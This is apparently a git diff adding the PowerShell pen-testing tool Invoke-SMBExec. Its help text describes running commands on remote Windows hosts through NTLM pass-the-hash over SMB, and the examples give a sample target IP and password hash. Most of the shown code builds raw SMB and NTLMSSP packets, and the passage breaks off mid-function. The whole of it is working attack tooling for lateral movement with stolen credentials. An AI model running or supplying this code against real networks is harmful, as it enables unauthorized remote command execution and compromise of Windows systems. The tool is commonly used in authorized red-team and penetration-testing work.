+ $SMB_client_stream.Close()
+ }
+
+ }
+
+}
+
+ if(!$Modify -or $Action -eq 'Put')
+ {
+ Write-Output $output_message
+ }
+ elseif($output_message)
+ {
+ Write-Verbose $output_message
+ }
+
+} \ No newline at end of file
diff --git a/Invoke-SMBExec.ps1 b/Invoke-SMBExec.ps1
new file mode 100644
index 0000000..7a4d868
--- /dev/null
+++ b/Invoke-SMBExec.ps1
@@ -0,0 +1,2777 @@
+function Invoke-SMBExec
+{
+<#
+.SYNOPSIS
+Invoke-SMBExec performs SMBExec style command execution with NTLMv2 pass the hash authentication. Invoke-SMBExec
+supports SMB1 and SMB2 with and without SMB signing.
+
+Author: Kevin Robertson (@kevin_robertson)
+License: BSD 3-Clause
+
+.PARAMETER Target
+Hostname or IP address of target.
+
+.PARAMETER Username
+Username to use for authentication.
+
+.PARAMETER Domain
+Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the
+username.
+
+.PARAMETER Hash
+NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
+
+.PARAMETER Command
+Command to execute on the target. If a command is not specified, the function will check to see if the username
+and hash provides local administrator access on the target.
+
+.PARAMETER CommandCOMSPEC
+Default = Enabled: Prepend %COMSPEC% /C to Command.
+
+.PARAMETER Service
+Default = 20 Character Random: Name of the service to create and delete on the target.
+
+.PARAMETER SMB1
+(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
+target.
+
+.PARAMETER Sleep
+Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this
+setting if you are experiencing strange results.
+
+.PARAMETER Session
+Inveigh-Relay authenticated session.
+
+.PARAMETER SigningCheck
+(Switch) Checks to see if SMB signing is required on a target.
+
+.EXAMPLE
+Execute a command.
+Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
+
+.EXAMPLE
+Check command execution privilege.
+Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
+
+.EXAMPLE
+Execute a command using an authenticated Inveigh-Relay session.
+Invoke-SMBExec -Session 1 -Command "command or launcher to execute"
+
+.EXAMPLE
+Check if SMB signing is required.
+Invoke-SMBExec -Target 192.168.100.20 -SigningCheck
+
+.LINK
+https://github.com/Kevin-Robertson/Invoke-TheHash
+
+#>
+[CmdletBinding(DefaultParametersetName='Default')]
+param
+(
+ [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Target,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$Command,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y",
+ [parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash,
+ [parameter(Mandatory=$false)][String]$Service,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][Switch]$SigningCheck,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][Switch]$SMB1,
+ [parameter(Mandatory=$false)][Int]$Sleep=150
+)
+
+if($Command)
+{
+ $SMB_execute = $true
+}
+
+if($SMB1)
+{
+ $SMB_version = 'SMB1'
+}
+
+function ConvertFrom-PacketOrderedDictionary
+{
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+}
+
+#NetBIOS
+
+function New-PacketNetBIOSSessionService
+{
+ param([Int]$packet_header_length,[Int]$packet_data_length)
+
+ [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
+ $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
+
+ $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NetBIOSSessionService.Add("Message_Type",[Byte[]](0x00))
+ $packet_NetBIOSSessionService.Add("Length",[Byte[]]($packet_netbios_session_service_length))
+
+ return $packet_NetBIOSSessionService
+}
+
+#SMB1
+
+function New-PacketSMBHeader
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+
+ $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $packet_SMBHeader.Add("Command",$packet_command)
+ $packet_SMBHeader.Add("ErrorClass",[Byte[]](0x00))
+ $packet_SMBHeader.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Flags",$packet_flags)
+ $packet_SMBHeader.Add("Flags2",$packet_flags2)
+ $packet_SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("TreeID",$packet_tree_ID)
+ $packet_SMBHeader.Add("ProcessID",$packet_process_ID)
+ $packet_SMBHeader.Add("UserID",$packet_user_ID)
+ $packet_SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00))
+
+ return $packet_SMBHeader
+}
+
+function New-PacketSMBNegotiateProtocolRequest
+{
+ param([String]$packet_version)
+
+ if($packet_version -eq 'SMB1')
+ {
+ [Byte[]]$packet_byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_byte_count = 0x22,0x00
+ }
+
+ $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("ByteCount",$packet_byte_count)
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($packet_version -ne 'SMB1')
+ {
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $packet_SMBNegotiateProtocolRequest
+}
+
+function New-PacketSMBSessionSetupAndXRequest
+{
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_byte_count = $packet_byte_count[0,1]
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBSessionSetupAndXRequest.Add("WordCount",[Byte[]](0x0c))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxBuffer",[Byte[]](0xff,0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxMpxCount",[Byte[]](0x02,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("VCNumber",[Byte[]](0x01,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlobLength",$packet_byte_count)
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
+ $packet_SMBSessionSetupAndXRequest.Add("ByteCount",$packet_security_blob_length)
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlob",$packet_security_blob)
+ $packet_SMBSessionSetupAndXRequest.Add("NativeOS",[Byte[]](0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("NativeLANManage",[Byte[]](0x00,0x00))
+
+ return $packet_SMBSessionSetupAndXRequest
+}
+
+function New-PacketSMBTreeConnectAndXRequest
+{
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeConnectAndXRequest.Add("WordCount",[Byte[]](0x04))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBTreeConnectAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("PasswordLength",[Byte[]](0x01,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("ByteCount",$packet_path_length)
+ $packet_SMBTreeConnectAndXRequest.Add("Password",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Tree",$packet_path)
+ $packet_SMBTreeConnectAndXRequest.Add("Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
+
+ return $packet_SMBTreeConnectAndXRequest
+}
+
+function New-PacketSMBNTCreateAndXRequest
+{
+ param([Byte[]]$packet_named_pipe)
+
+ [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+ [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
+ $packet_file_name_length = $packet_file_name_length[0,1]
+
+ $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNTCreateAndXRequest.Add("WordCount",[Byte[]](0x18))
+ $packet_SMBNTCreateAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved2",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileNameLen",$packet_file_name_length)
+ $packet_SMBNTCreateAndXRequest.Add("CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("RootFID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $packet_SMBNTCreateAndXRequest.Add("AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Disposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SecurityFlags",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ByteCount",$packet_named_pipe_length)
+ $packet_SMBNTCreateAndXRequest.Add("Filename",$packet_named_pipe)
+
+ return $packet_SMBNTCreateAndXRequest
+}
+
+function New-PacketSMBReadAndXRequest
+{
+ $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBReadAndXRequest.Add("WordCount",[Byte[]](0x0a))
+ $packet_SMBReadAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBReadAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBReadAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("FID",[Byte[]](0x00,0x40))
+ $packet_SMBReadAndXRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("MaxCountLow",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("MinCount",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("Unknown",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBReadAndXRequest.Add("Remaining",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBReadAndXRequest
+}
+
+function New-PacketSMBWriteAndXRequest
+{
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+ $packet_write_length = $packet_write_length[0,1]
+
+ $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBWriteAndXRequest.Add("WordCount",[Byte[]](0x0e))
+ $packet_SMBWriteAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBWriteAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBWriteAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("FID",$packet_file_ID)
+ $packet_SMBWriteAndXRequest.Add("Offset",[Byte[]](0xea,0x03,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBWriteAndXRequest.Add("WriteMode",[Byte[]](0x08,0x00))
+ $packet_SMBWriteAndXRequest.Add("Remaining",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataLengthHigh",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("DataLengthLow",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataOffset",[Byte[]](0x3f,0x00))
+ $packet_SMBWriteAndXRequest.Add("HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("ByteCount",$packet_write_length)
+
+ return $packet_SMBWriteAndXRequest
+}
+
+function New-PacketSMBCloseRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBCloseRequest.Add("WordCount",[Byte[]](0x03))
+ $packet_SMBCloseRequest.Add("FID",$packet_file_ID)
+ $packet_SMBCloseRequest.Add("LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBCloseRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBCloseRequest
+}
+
+function New-PacketSMBTreeDisconnectRequest
+{
+ $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeDisconnectRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBTreeDisconnectRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBTreeDisconnectRequest
+}
+
+function New-PacketSMBLogoffAndXRequest
+{
+ $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBLogoffAndXRequest.Add("WordCount",[Byte[]](0x02))
+ $packet_SMBLogoffAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBLogoffAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBLogoffAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBLogoffAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBLogoffAndXRequest
+}
+
+#SMB2
+
+function New-PacketSMB2Header
+{
+ param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+}
+
+function New-PacketSMB2NegotiateProtocolRequest
+{
+ $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02))
+
+ return $packet_SMB2NegotiateProtocolRequest
+}
+
+function New-PacketSMB2SessionSetupRequest
+{
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01))
+ $packet_SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferLength",$packet_security_blob_length)
+ $packet_SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Buffer",$packet_security_blob)
+
+ return $packet_SMB2SessionSetupRequest
+}
+
+function New-PacketSMB2TreeConnectRequest
+{
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00))
+ $packet_SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathLength",$packet_path_length)
+ $packet_SMB2TreeConnectRequest.Add("Buffer",$packet_path)
+
+ return $packet_SMB2TreeConnectRequest
+}
+
+function New-PacketSMB2CreateRequestFile
+{
+ param([Byte[]]$packet_named_pipe)
+
+ $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+
+ $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CreateRequestFile.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2CreateRequestFile.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("RequestedOplockLevel",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameOffset",[Byte[]](0x78,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameLength",$packet_named_pipe_length)
+ $packet_SMB2CreateRequestFile.Add("CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Buffer",$packet_named_pipe)
+
+ return $packet_SMB2CreateRequestFile
+}
+
+function New-PacketSMB2ReadRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2ReadRequest.Add("Padding",[Byte[]](0x50))
+ $packet_SMB2ReadRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2ReadRequest.Add("Length",[Byte[]](0x00,0x00,0x10,0x00))
+ $packet_SMB2ReadRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Buffer",[Byte[]](0x30))
+
+ return $packet_SMB2ReadRequest
+}
+
+function New-PacketSMB2WriteRequest
+{
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+
+ $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00))
+ $packet_SMB2WriteRequest.Add("Length",$packet_write_length)
+ $packet_SMB2WriteRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2WriteRequest
+}
+
+function New-PacketSMB2CloseRequest
+{
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00))
+ $packet_SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CloseRequest.Add("FileID",$packet_file_ID)
+
+ return $packet_SMB2CloseRequest
+}
+
+function New-PacketSMB2TreeDisconnectRequest
+{
+ $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2TreeDisconnectRequest
+}
+
+function New-PacketSMB2SessionLogoffRequest
+{
+ $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2SessionLogoffRequest
+}
+
+#NTLM
+
+function New-PacketNTLMSSPNegotiate
+{
+ param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
+ [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
+ [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
+ [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
+ [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
+
+ $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60))
+ $packet_NTLMSSPNegotiate.Add("InitialcontextTokenLength",$packet_ASN_length_1)
+ $packet_NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength",$packet_ASN_length_2)
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength2",$packet_ASN_length_3)
+ $packet_NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0))
